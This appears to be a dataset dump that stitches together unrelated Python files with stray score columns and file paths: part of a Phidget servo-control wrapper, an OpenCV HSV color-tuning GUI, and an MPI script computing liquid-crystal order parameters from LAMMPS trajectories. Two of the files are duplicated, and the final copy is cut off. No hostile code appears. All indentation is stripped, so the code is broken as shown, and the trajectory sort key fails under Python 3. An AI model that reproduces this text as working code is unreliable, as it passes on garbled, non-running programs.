if velocityChangeHandler == None:
self.__velocityChange = None
self.__onVelocityChange = None
else:
self.__velocityChange = velocityChangeHandler
self.__onVelocityChange = self.__VELOCITYCHANGEHANDLER(self.__nativeVelocityChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnVelocityChange_Handler(self.handle, self.__onVelocityChange, None)
except RuntimeError:
self.__velocityChange = None
self.__onVelocityChange = None
raise
if result > 0:
raise PhidgetException(result)
def getPosition(self, index):
"""Returns the position of a servo motor.
Note that since servo motors do not offer any feedback in their interface, this value is simply whatever the servo was last set to.
There is no way of determining the position of a servo that has been plugged in, until it's position has been set.
Therefore, if an initial position is important, it should be set as part of initialization.
If the servo is not engaged, the position is unknown and calling this function will throw an exception.
The range here is between getPositionMin and getPositionMax, and corresponds aproximately to an angle in degrees. Note that most servos will not be able to operate accross this entire range.
Parameters:
index<int>: index of the motor.
Returns:
The current position of the selected motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range, or the motor is not engaged.
"""
position = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPosition(self.handle, c_int(index), byref(position))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return position.value
def setPosition(self, index, value):
"""Sets the position of a servo motor.
The range here is between getPositionMin and getPositionMax, and corresponds aproximately to an angle in degrees.
Note that most servos will not be able to operate accross this entire range.
Typically, the range might be 25 - 180 degrees, but this depends on the servo.
Parameters:
index<int>: index of the motor.
position<double>: desired position for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or position is out of range,
or if the desired position is out of range, or if the motor is not engaged.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPosition(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getPositionMax(self, index):
"""Returns the maximum position that a servo will accept, or return.
Returns:
The maximum position in degrees <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
positionMax = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPositionMax(self.handle, c_int(index), byref(positionMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return positionMax.value
def setPositionMax(self, index, value):
"""Sets the maximum position of a servo motor.
Parameters:
index<int>: index of the motor.
position<double>: desired maximum position limit for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or position is out of range,
or if the desired maximum position limit is out of range, or if the motor is not engaged.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPositionMax(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getPositionMin(self, index):
"""Returns the minimum position that a servo will accept, or return.
Returns:
The minimum position in degrees <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
positionMin = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getPositionMin(self.handle, c_int(index), byref(positionMin))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return positionMin.value
def setPositionMin(self, index, value):
"""Sets the minimum position of a servo motor.
Parameters:
index<int>: index of the motor.
position<double>: desired minimum position limit for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index or position is out of range,
or if the desired minimum position limit is out of range, or if the motor is not engaged.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setPositionMin(self.handle, c_int(index), c_double(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def __nativePositionChangeEvent(self, handle, usrptr, index, value):
if self.__positionChange != None:
self.__positionChange(PositionChangeEventArgs(self, index, value))
return 0
def setOnPositionChangeHandler(self, positionChangeHandler):
"""Sets the Position Change Event Handler.
The servo position change handler is a method that will be called when the servo position has changed.
The event will get fired after every call to setPosition.
Parameters:
positionChangeHandler: hook to the positionChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
if positionChangeHandler == None:
self.__positionChange = None
self.__onPositionChange = None
else:
self.__positionChange = positionChangeHandler
self.__onPositionChange = self.__POSITIONCHANGEHANDLER(self.__nativePositionChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnPositionChange_Handler(self.handle, self.__onPositionChange, None)
except RuntimeError:
self.__positionChange = None
self.__onPositionChange = None
raise
if result > 0:
raise PhidgetException(result)
def getCurrent(self, index):
"""Returns a motor's current usage.
Parameters:
index<int>: index of the motor.
Returns:
The current usage of the motor <double>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
current = c_double()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getCurrent(self.handle, c_int(index), byref(current))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return current.value
def __nativeCurrentChangeEvent(self, handle, usrptr, index, value):
if self.__currentChange != None:
self.__currentChange(CurrentChangeEventArgs(self, index, value))
return 0
def setOnCurrentChangeHandler(self, currentChangeHandler):
"""Sets the CurrentCHange Event Handler.
The current change handler is a method that will be called when the current consumed by a motor changes.
Parameters:
currentChangeHandler: hook to the currentChangeHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
if currentChangeHandler == None:
self.__currentChange = None
self.__onCurrentChange = None
else:
self.__currentChange = currentChangeHandler
self.__onCurrentChange = self.__CURRENTCHANGEHANDLER(self.__nativeCurrentChangeEvent)
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnCurrentChange_Handler(self.handle, self.__onCurrentChange, None)
except RuntimeError:
self.__currentChange = None
self.__onCurrentChange = None
raise
if result > 0:
raise PhidgetException(result)
def getSpeedRampingOn(self, index):
"""Gets the speed ramping state for a motor.
This is whether or not velocity and acceleration are used.
Parameters:
index<int>: index of the motor.
Returns:
The current state of the speedRamping flag for this motor<boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
rampingState = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getSpeedRampingOn(self.handle, c_int(index), byref(rampingState))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if rampingState.value == 1:
return True
else:
return False
def setSpeedRampingOn(self, index, state):
"""Sets the speed ramping state for a motor.
This is whether or not velocity and acceleration are used.
Parameters:
index<int>: Index of the motor.
state<boolean>: State to set the speedRamping flag for this motor to.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
if state == True:
value = 1
else:
value = 0
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setSpeedRampingOn(self.handle, c_int(index), c_int(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getEngaged(self, index):
"""Gets the engaged state of a motor.
This is whether the motor is powered or not.
Parameters:
index<int>: index of the motor.
Returns:
The current state of the engaged flag for this motor<boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
engagedState = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getEngaged(self.handle, c_int(index), byref(engagedState))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if engagedState.value == 1:
return True
else:
return False
def setEngaged(self, index, state):
"""Sets the engaged state of a motor.
This is whether the motor is powered or not.
Parameters:
index<int>: Index of the motor.
state<boolean>: State to set the engaged flag for this motor to.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
if state == True:
value = 1
else:
value = 0
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setEngaged(self.handle, c_int(index), c_int(value))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getStopped(self, index):
"""Gets the stopped state of a motor.
This is true when the motor is not moving and there are no outstanding commands.
Parameters:
index<int>: index of the motor.
Returns:
The current state of the stopped flag for this motor<boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is invalid.
"""
stoppedState = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getStopped(self.handle, c_int(index), byref(stoppedState))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if stoppedState.value == 1:
return True
else:
return False
def getServoType(self, index):
"""Returns the servo type of the specified motor.
Parameters:
index<int>: index of a servo motor.
Returns:
Servo type for the motor<int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
servoType = c_int()
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_getServoType(self.handle, c_int(index), byref(servoType))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return servoType.value
def setServoType(self, index, servoType):
"""Sets the desired servo type for a specified motor.
Parameters:
index<int>: index of a servo motor.
servoType<int>: The desired servo type for the motor.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setServoType(self.handle, c_int(index), c_int(servoType))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def setServoParameters(self, index, minimumPulseWidth, maximumPulseWidth, degrees, velocityMax):
"""Sets custom servo parameters for using a servo not in the predefined list.
Pulse widths are specified in microseconds.
Parameters:
index<int>: index of a servo motor.
minimumPulseWidth<double>: The minimum pulse width for this servo motor type.
maximumPulseWidth<double>: The Maximum pulse width for this servo motor type.
degrees<double>: The maximum degrees of rotation this servo motor type is capable of.
velocityMax<double>: The maximum velocity this servo motor type is capable of.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if the index is out of range.
"""
try:
result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setServoParameters(self.handle, c_int(index), c_double(minimumPulseWidth), c_double(maximumPulseWidth), c_double(degrees), c_double(velocityMax))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result) | 0.536799 | 0.110904 |
import os
import json
from tkinter import *
import numpy as np
import cv2
from PIL import Image
from PIL import ImageTk
__author__ = "SumiGovindaraju"
__copyright__ = "Copyright 2018, SumiGovindaraju"
__credits__ = ["SumiGovindaraju"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "SumiGovindaraju"
__status__ = "Development"
def pipeline(img):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
thresh = cv2.inRange(hsv, hsv_min, hsv_max)
closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(10, 10)))
opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10)))
contours, hierarchy = cv2.findContours(opening, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
cv2.drawContours(img, contours, -1, (0, 255, 0), 3)
return opening
def saveHSVToFileAndClose():
file = open("config.json", "w")
jsonObj = {
'min': {
'hue': str(hsv_min[0]),
'saturation': str(hsv_min[1]),
'value': str(hsv_min[2])
},
'max': {
'hue': str(hsv_max[0]),
'saturation': str(hsv_max[1]),
'value': str(hsv_max[2])
}
}
file.write(u"" + json.dumps(jsonObj))
root.quit()
def loadHSVFromFile(key):
try:
with open("config.json") as json_data:
data = json.load(json_data)
return np.array([data[key]["hue"], data[key]["saturation"], data[key]["value"]], dtype=np.uint8)
except IOError as e:
return np.array([90, 128, 128], dtype=np.uint8)
def addPixelHSV():
if selectedPixel[0] < 0 or selectedPixel[1] < 0:
return
hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
selectedHSV = hsv[selectedPixel[1], selectedPixel[0]]
if int(selectedHSV[0]) < hsv_min[0]:
app.huemin.set(int(selectedHSV[0]) - 10)
if int(selectedHSV[1]) < hsv_min[1]:
app.satmin.set(int(selectedHSV[1]) - 10)
if int(selectedHSV[2]) < hsv_min[2]:
app.valmin.set(int(selectedHSV[2]) - 10)
if int(selectedHSV[0]) > hsv_max[0]:
app.huemax.set(int(selectedHSV[0]) + 10)
if int(selectedHSV[1]) > hsv_max[1]:
app.satmax.set(int(selectedHSV[1]) + 10)
if int(selectedHSV[2]) > hsv_max[2]:
app.valmax.set(int(selectedHSV[2]) + 10)
def subtractPixelHSV():
if selectedPixel[0] < 0 or selectedPixel[1] < 0:
return
hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
selectedHSV = hsv[selectedPixel[1], selectedPixel[0]]
if abs(selectedHSV[0] - hsv_min[0]) < abs(selectedHSV[0] - hsv_max[0]):
app.huemin.set(selectedHSV[0] + 10)
else:
app.huemax.set(selectedHSV[0] - 10)
if abs(selectedHSV[1] - hsv_min[1]) < abs(selectedHSV[1] - hsv_max[1]):
app.satmin.set(selectedHSV[1] + 10)
else:
app.satmax.set(selectedHSV[1] - 10)
if abs(selectedHSV[2] - hsv_min[2]) < abs(selectedHSV[2] - hsv_max[2]):
app.valmin.set(selectedHSV[2] + 10)
else:
app.valmax.set(selectedHSV[2] - 10)
def selectPixel(event):
selectedPixel[0] = event.x
selectedPixel[1] = event.y
cv2.namedWindow("Pixel Selected")
b,g,r = app.frame[selectedPixel[1], selectedPixel[0]]
pixel = np.zeros((50, 50, 3), np.uint8)
pixel[:] = [b, g, r]
cv2.imshow("Pixel Selected", pixel)
hsv_min = loadHSVFromFile("min")
hsv_max = loadHSVFromFile("max")
selectedPixel = [-1, -1]
class TunerWindow(Frame):
def video_loop(self):
if self.valmax.winfo_exists() == 1:
hsv_min[0] = self.huemin.get()
hsv_min[1] = self.satmin.get()
hsv_min[2] = self.valmin.get()
hsv_max[0] = self.huemax.get()
hsv_max[1] = self.satmax.get()
hsv_max[2] = self.valmax.get()
retval, self.frame = self.videocapture.read()
self.frame = cv2.resize(self.frame, (0,0), fx=0.4, fy=0.4)
mask = pipeline(self.frame)
if retval:
cv2image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGBA) if self.showRawPhoto.get() else mask
currentImg = Image.fromarray(cv2image)
currentImgTK = ImageTk.PhotoImage(image=currentImg)
self.imgpanel.currentImgTK = currentImgTK
self.imgpanel.config(image=currentImgTK)
def __init__(self, master):
self.tk = master
# Camera settings and such
# Play around with these to get faster camera feed
self.videocapture = cv2.VideoCapture(0)
self.videocapture.set(cv2.CAP_PROP_AUTOFOCUS, 0)
default_exposure = self.videocapture.get(cv2.CAP_PROP_EXPOSURE)
custom_exposure = 1 #can be changed
self.videocapture.set(cv2.CAP_PROP_EXPOSURE, default_exposure)
self.tk.title("Vision Pipeline Tuning")
self.tk.protocol("WM_DELETE_WINDOW", saveHSVToFileAndClose)
self.imgpanel = Label(self.tk)
self.imgpanel.bind("<Button-1>", selectPixel)
self.imgpanel.pack()
self.buttonpanel = Label(self.tk)
self.buttonpanel.pack()
self.showRawPhoto = IntVar()
toggleMask = Checkbutton(self.tk, text="Toggle Mask", onvalue=False, offvalue=True, variable=self.showRawPhoto)
toggleMask.pack(in_=self.buttonpanel, side=LEFT)
addPixel = Button(self.tk, text="Add Pixel", command=addPixelHSV)
addPixel.pack(in_=self.buttonpanel, side=LEFT)
subtractPixel = Button(self.tk, text="Subtract Pixel", command=subtractPixelHSV)
subtractPixel.pack(in_=self.buttonpanel, side=RIGHT)
self.sliderpanel = Label(self.tk)
self.sliderpanel.pack()
hueminLabel = Label(self.tk, text="Hue Min:")
hueminLabel.pack()
self.huemin = Scale(master, from_=0, to=180, orient=HORIZONTAL)
self.huemin.set(hsv_min[0])
self.huemin.pack()
huemaxLabel = Label(self.tk, text="Hue Max:")
huemaxLabel.pack()
self.huemax = Scale(master, from_=0, to=180, orient=HORIZONTAL)
self.huemax.set(hsv_max[0])
self.huemax.pack()
satminLabel = Label(self.tk, text="Sat Min:")
satminLabel.pack()
self.satmin = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.satmin.set(hsv_min[1])
self.satmin.pack()
satmaxLabel = Label(self.tk, text="Sat Max:")
satmaxLabel.pack()
self.satmax = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.satmax.set(hsv_max[1])
self.satmax.pack()
valminLabel = Label(self.tk, text="Val Min:")
valminLabel.pack()
self.valmin = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.valmin.set(hsv_min[2])
self.valmin.pack()
valmaxLabel = Label(self.tk, text="Val Max:")
valmaxLabel.pack()
self.valmax = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.valmax.set(hsv_max[2])
self.valmax.pack()
root = Tk()
app = TunerWindow(root)
if __name__ == "__main__":
while True:
app.video_loop()
app.update_idletasks()
app.update() | tuner.py | import os
import json
from tkinter import *
import numpy as np
import cv2
from PIL import Image
from PIL import ImageTk
__author__ = "SumiGovindaraju"
__copyright__ = "Copyright 2018, SumiGovindaraju"
__credits__ = ["SumiGovindaraju"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "SumiGovindaraju"
__status__ = "Development"
def pipeline(img):
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
thresh = cv2.inRange(hsv, hsv_min, hsv_max)
closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(10, 10)))
opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10)))
contours, hierarchy = cv2.findContours(opening, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
cv2.drawContours(img, contours, -1, (0, 255, 0), 3)
return opening
def saveHSVToFileAndClose():
file = open("config.json", "w")
jsonObj = {
'min': {
'hue': str(hsv_min[0]),
'saturation': str(hsv_min[1]),
'value': str(hsv_min[2])
},
'max': {
'hue': str(hsv_max[0]),
'saturation': str(hsv_max[1]),
'value': str(hsv_max[2])
}
}
file.write(u"" + json.dumps(jsonObj))
root.quit()
def loadHSVFromFile(key):
try:
with open("config.json") as json_data:
data = json.load(json_data)
return np.array([data[key]["hue"], data[key]["saturation"], data[key]["value"]], dtype=np.uint8)
except IOError as e:
return np.array([90, 128, 128], dtype=np.uint8)
def addPixelHSV():
if selectedPixel[0] < 0 or selectedPixel[1] < 0:
return
hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
selectedHSV = hsv[selectedPixel[1], selectedPixel[0]]
if int(selectedHSV[0]) < hsv_min[0]:
app.huemin.set(int(selectedHSV[0]) - 10)
if int(selectedHSV[1]) < hsv_min[1]:
app.satmin.set(int(selectedHSV[1]) - 10)
if int(selectedHSV[2]) < hsv_min[2]:
app.valmin.set(int(selectedHSV[2]) - 10)
if int(selectedHSV[0]) > hsv_max[0]:
app.huemax.set(int(selectedHSV[0]) + 10)
if int(selectedHSV[1]) > hsv_max[1]:
app.satmax.set(int(selectedHSV[1]) + 10)
if int(selectedHSV[2]) > hsv_max[2]:
app.valmax.set(int(selectedHSV[2]) + 10)
def subtractPixelHSV():
if selectedPixel[0] < 0 or selectedPixel[1] < 0:
return
hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
selectedHSV = hsv[selectedPixel[1], selectedPixel[0]]
if abs(selectedHSV[0] - hsv_min[0]) < abs(selectedHSV[0] - hsv_max[0]):
app.huemin.set(selectedHSV[0] + 10)
else:
app.huemax.set(selectedHSV[0] - 10)
if abs(selectedHSV[1] - hsv_min[1]) < abs(selectedHSV[1] - hsv_max[1]):
app.satmin.set(selectedHSV[1] + 10)
else:
app.satmax.set(selectedHSV[1] - 10)
if abs(selectedHSV[2] - hsv_min[2]) < abs(selectedHSV[2] - hsv_max[2]):
app.valmin.set(selectedHSV[2] + 10)
else:
app.valmax.set(selectedHSV[2] - 10)
def selectPixel(event):
selectedPixel[0] = event.x
selectedPixel[1] = event.y
cv2.namedWindow("Pixel Selected")
b,g,r = app.frame[selectedPixel[1], selectedPixel[0]]
pixel = np.zeros((50, 50, 3), np.uint8)
pixel[:] = [b, g, r]
cv2.imshow("Pixel Selected", pixel)
hsv_min = loadHSVFromFile("min")
hsv_max = loadHSVFromFile("max")
selectedPixel = [-1, -1]
class TunerWindow(Frame):
def video_loop(self):
if self.valmax.winfo_exists() == 1:
hsv_min[0] = self.huemin.get()
hsv_min[1] = self.satmin.get()
hsv_min[2] = self.valmin.get()
hsv_max[0] = self.huemax.get()
hsv_max[1] = self.satmax.get()
hsv_max[2] = self.valmax.get()
retval, self.frame = self.videocapture.read()
self.frame = cv2.resize(self.frame, (0,0), fx=0.4, fy=0.4)
mask = pipeline(self.frame)
if retval:
cv2image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGBA) if self.showRawPhoto.get() else mask
currentImg = Image.fromarray(cv2image)
currentImgTK = ImageTk.PhotoImage(image=currentImg)
self.imgpanel.currentImgTK = currentImgTK
self.imgpanel.config(image=currentImgTK)
def __init__(self, master):
self.tk = master
# Camera settings and such
# Play around with these to get faster camera feed
self.videocapture = cv2.VideoCapture(0)
self.videocapture.set(cv2.CAP_PROP_AUTOFOCUS, 0)
default_exposure = self.videocapture.get(cv2.CAP_PROP_EXPOSURE)
custom_exposure = 1 #can be changed
self.videocapture.set(cv2.CAP_PROP_EXPOSURE, default_exposure)
self.tk.title("Vision Pipeline Tuning")
self.tk.protocol("WM_DELETE_WINDOW", saveHSVToFileAndClose)
self.imgpanel = Label(self.tk)
self.imgpanel.bind("<Button-1>", selectPixel)
self.imgpanel.pack()
self.buttonpanel = Label(self.tk)
self.buttonpanel.pack()
self.showRawPhoto = IntVar()
toggleMask = Checkbutton(self.tk, text="Toggle Mask", onvalue=False, offvalue=True, variable=self.showRawPhoto)
toggleMask.pack(in_=self.buttonpanel, side=LEFT)
addPixel = Button(self.tk, text="Add Pixel", command=addPixelHSV)
addPixel.pack(in_=self.buttonpanel, side=LEFT)
subtractPixel = Button(self.tk, text="Subtract Pixel", command=subtractPixelHSV)
subtractPixel.pack(in_=self.buttonpanel, side=RIGHT)
self.sliderpanel = Label(self.tk)
self.sliderpanel.pack()
hueminLabel = Label(self.tk, text="Hue Min:")
hueminLabel.pack()
self.huemin = Scale(master, from_=0, to=180, orient=HORIZONTAL)
self.huemin.set(hsv_min[0])
self.huemin.pack()
huemaxLabel = Label(self.tk, text="Hue Max:")
huemaxLabel.pack()
self.huemax = Scale(master, from_=0, to=180, orient=HORIZONTAL)
self.huemax.set(hsv_max[0])
self.huemax.pack()
satminLabel = Label(self.tk, text="Sat Min:")
satminLabel.pack()
self.satmin = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.satmin.set(hsv_min[1])
self.satmin.pack()
satmaxLabel = Label(self.tk, text="Sat Max:")
satmaxLabel.pack()
self.satmax = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.satmax.set(hsv_max[1])
self.satmax.pack()
valminLabel = Label(self.tk, text="Val Min:")
valminLabel.pack()
self.valmin = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.valmin.set(hsv_min[2])
self.valmin.pack()
valmaxLabel = Label(self.tk, text="Val Max:")
valmaxLabel.pack()
self.valmax = Scale(master, from_=0, to=255, orient=HORIZONTAL)
self.valmax.set(hsv_max[2])
self.valmax.pack()
root = Tk()
app = TunerWindow(root)
if __name__ == "__main__":
while True:
app.video_loop()
app.update_idletasks()
app.update() | 0.401805 | 0.12544 |
import numpy as np
from glob import glob
from mpi4py import MPI
from nematic_sma_OP import PO
rank = MPI.COMM_WORLD.Get_rank()
nprocs = MPI.COMM_WORLD.Get_size()
first_frame = -2500
last_frame = -1
def open_trajectory(nprocs, rank, first_frame, last_frame, wrap=False, visualize=False, ini_layer_spacing=27.,
gb_type=3, gb_ends_type=2, atoms_per_monomer=13, number_of_monomer=1440, number_of_chains=144):
"""
This function will open a LAMMPS trajectory in parallel to calculate the SmA and nematic order parameters.
Each frames are considered independent, and the final results are transmitted to the processor with rank=0
Args:
----
nprocs(int): number of processor (read from mpirun command)
rank(int): rank of the process
first_frame(int): the first frame of the trajectory
last_frame(int): the last frame of the trajectory
wrap(bool): True if the coordinates are to be wrapped
visualize(bool): True if the gz12 in function of z12 graph for the SmA OP is desired(3X slower)
ini_layer_spacing(float): SmA layer spacing to optimize
gb_type(int): atom type of the ellipsoid
gb_ends_type(int): atom type of the pseudo-atoms at the end of the ellipsoids
atoms_per_monomer(int): atoms per monomer in the chains
number_of_monomer(int): total number of monomer in the system
number_of_chains(int): number of polymer chains in the system
Returns:
----
nematic_OP.out(text file): a file with the timestep and the calculated nematic OP
sma_OP.out(text file): a file with the timestep, the SmA OP and the optimized layer spacing
"""
# create a list of all the files in the trajectory
complete_trajectory = glob("*dump*")
# sort the list
complete_trajectory.sort(key=lambda f: int(filter(str.isdigit, f)))
# consider only the desired frames
desired_trajectory = complete_trajectory[first_frame:last_frame]
# Divide the trajectory by the number of rank
fragment_trajectory = np.array_split(desired_trajectory, nprocs)
# select a fragment of the trajectory for each rank
for trajectory in np.nditer(fragment_trajectory[rank][:], flags=['external_loop']):
steps_nematic_OP = []
steps_sma_OP_distance = []
for dump in trajectory:
po = PO(dump, wrap, visualize, ini_layer_spacing, gb_type, gb_ends_type,
atoms_per_monomer, number_of_monomer, number_of_chains)
# nematic
step, nematic_OP, director = po.nematic()
steps_nematic_OP.append([step, nematic_OP])
# sma
step, sma_OP, distance = po.sma()
steps_sma_OP_distance.append([step, sma_OP, distance])
print("Rank: ", rank, " has finished")
MPI.COMM_WORLD.barrier()
# the processor with rank=0 gather the calculated OP
steps_nematic_OP = MPI.COMM_WORLD.gather(steps_nematic_OP, root=0)
MPI.COMM_WORLD.barrier()
steps_sma_OP_distance = MPI.COMM_WORLD.gather(
steps_sma_OP_distance, root=0)
MPI.COMM_WORLD.barrier()
# rank=0 processor writes the output
if rank == 0:
steps_nematic_OP = np.concatenate(steps_nematic_OP)
steps_nematic_OP = steps_nematic_OP[steps_nematic_OP[:, 0].argsort()]
np.savetxt('nematic_OP.out', steps_nematic_OP)
steps_sma_OP_distance = np.concatenate(steps_sma_OP_distance)
steps_sma_OP_distance = steps_sma_OP_distance[steps_sma_OP_distance[:, 0].argsort(
)]
np.savetxt('sma_OP.out', steps_sma_OP_distance)
open_trajectory(nprocs, rank, first_frame, last_frame) | dataAnalysis/op_traj_mpi.py | import numpy as np
from glob import glob
from mpi4py import MPI
from nematic_sma_OP import PO
rank = MPI.COMM_WORLD.Get_rank()
nprocs = MPI.COMM_WORLD.Get_size()
first_frame = -2500
last_frame = -1
def open_trajectory(nprocs, rank, first_frame, last_frame, wrap=False, visualize=False, ini_layer_spacing=27.,
gb_type=3, gb_ends_type=2, atoms_per_monomer=13, number_of_monomer=1440, number_of_chains=144):
"""
This function will open a LAMMPS trajectory in parallel to calculate the SmA and nematic order parameters.
Each frames are considered independent, and the final results are transmitted to the processor with rank=0
Args:
----
nprocs(int): number of processor (read from mpirun command)
rank(int): rank of the process
first_frame(int): the first frame of the trajectory
last_frame(int): the last frame of the trajectory
wrap(bool): True if the coordinates are to be wrapped
visualize(bool): True if the gz12 in function of z12 graph for the SmA OP is desired(3X slower)
ini_layer_spacing(float): SmA layer spacing to optimize
gb_type(int): atom type of the ellipsoid
gb_ends_type(int): atom type of the pseudo-atoms at the end of the ellipsoids
atoms_per_monomer(int): atoms per monomer in the chains
number_of_monomer(int): total number of monomer in the system
number_of_chains(int): number of polymer chains in the system
Returns:
----
nematic_OP.out(text file): a file with the timestep and the calculated nematic OP
sma_OP.out(text file): a file with the timestep, the SmA OP and the optimized layer spacing
"""
# create a list of all the files in the trajectory
complete_trajectory = glob("*dump*")
# sort the list
complete_trajectory.sort(key=lambda f: int(filter(str.isdigit, f)))
# consider only the desired frames
desired_trajectory = complete_trajectory[first_frame:last_frame]
# Divide the trajectory by the number of rank
fragment_trajectory = np.array_split(desired_trajectory, nprocs)
# select a fragment of the trajectory for each rank
for trajectory in np.nditer(fragment_trajectory[rank][:], flags=['external_loop']):
steps_nematic_OP = []
steps_sma_OP_distance = []
for dump in trajectory:
po = PO(dump, wrap, visualize, ini_layer_spacing, gb_type, gb_ends_type,
atoms_per_monomer, number_of_monomer, number_of_chains)
# nematic
step, nematic_OP, director = po.nematic()
steps_nematic_OP.append([step, nematic_OP])
# sma
step, sma_OP, distance = po.sma()
steps_sma_OP_distance.append([step, sma_OP, distance])
print("Rank: ", rank, " has finished")
MPI.COMM_WORLD.barrier()
# the processor with rank=0 gather the calculated OP
steps_nematic_OP = MPI.COMM_WORLD.gather(steps_nematic_OP, root=0)
MPI.COMM_WORLD.barrier()
steps_sma_OP_distance = MPI.COMM_WORLD.gather(
steps_sma_OP_distance, root=0)
MPI.COMM_WORLD.barrier()
# rank=0 processor writes the output
if rank == 0:
steps_nematic_OP = np.concatenate(steps_nematic_OP)
steps_nematic_OP = steps_nematic_OP[steps_nematic_OP[:, 0].argsort()]
np.savetxt('nematic_OP.out', steps_nematic_OP)
steps_sma_OP_distance = np.concatenate(steps_sma_OP_distance)
steps_sma_OP_distance = steps_sma_OP_distance[steps_sma_OP_distance[:, 0].argsort(
)]
